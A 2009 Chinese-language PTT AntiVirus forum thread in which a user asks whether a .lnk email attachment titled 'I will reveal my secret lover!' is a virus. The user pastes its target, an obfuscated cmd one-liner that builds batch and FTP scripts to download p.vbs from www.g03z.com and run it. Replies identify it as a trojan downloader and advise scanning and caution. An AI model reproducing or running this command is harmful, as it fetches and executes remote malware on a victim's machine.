PTT數位生活區 / AntiVirus (防毒)

[問題] 病毒有可能偽裝成.lnk嗎?

看板AntiVirus (防毒)作者 (曖曖內含光)時間17年前 (2009/04/25 21:55), 編輯推噓8(801)
留言9則, 9人參與, 最新討論串1/1
我收到一封朋友寄的信, 標題是"我要公佈我的秘密情人!" 裡面只有一個附檔, 副檔名是.lnk, 我先試著用ultraedit打開, 結果一下子閃過好幾個類似像在解壓縮的視窗, 沒看清楚. 後來查看內容, 想看看這lnk目標是哪裡, 結果如下: %ComSpec% /c echo set a=.>z.bat&echo echo o www%a%g03z%a%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set vt=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%vt%s:l>>m&echo start p.vbs>>m&ren m s.bat&s.bat& 請問這是某種病毒嗎? 我剛google過並沒看到類似的東西... -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 72.66.29.142
04/25 22:04, , 1F
應該會有木馬下載 斷網掃毒
04/25 22:04, 1F
04/25 22:08, , 2F
就利用cmd的批次語法寫入一個vbs後在下載木馬到電腦內
04/25 22:08, 2F
04/25 22:09, , 3F
這病毒出很久了....
04/25 22:09, 3F
04/25 22:13, , 4F
收了十年的信真的沒收過朋友會寄這種標題的...
04/25 22:13, 4F
04/25 22:28, , 5F
反正遇到奇怪的檔案就不要亂開就對了。
04/25 22:28, 5F
04/25 23:15, , 6F
這類信我一律刪,不會想去看
04/25 23:15, 6F
04/26 00:19, , 7F
即使是認識的朋友寄的 也不要開 朋友也有可能中木馬
04/26 00:19, 7F
04/26 01:01, , 8F
有標題就可以未看先猜了
04/26 01:01, 8F
04/28 09:01, , 9F
恭喜中標XD
04/28 09:01, 9F
更多 fullid 的文章
文章代碼(AID): #19ynPWWa (AntiVirus)
AntiVirus 近期熱門文章
更多 近期熱門文章 >>
PTT數位生活區 即時熱門文章
更多 即時熱門文章 >>
更多 fullid 的文章
文章代碼(AID): #19ynPWWa (AntiVirus)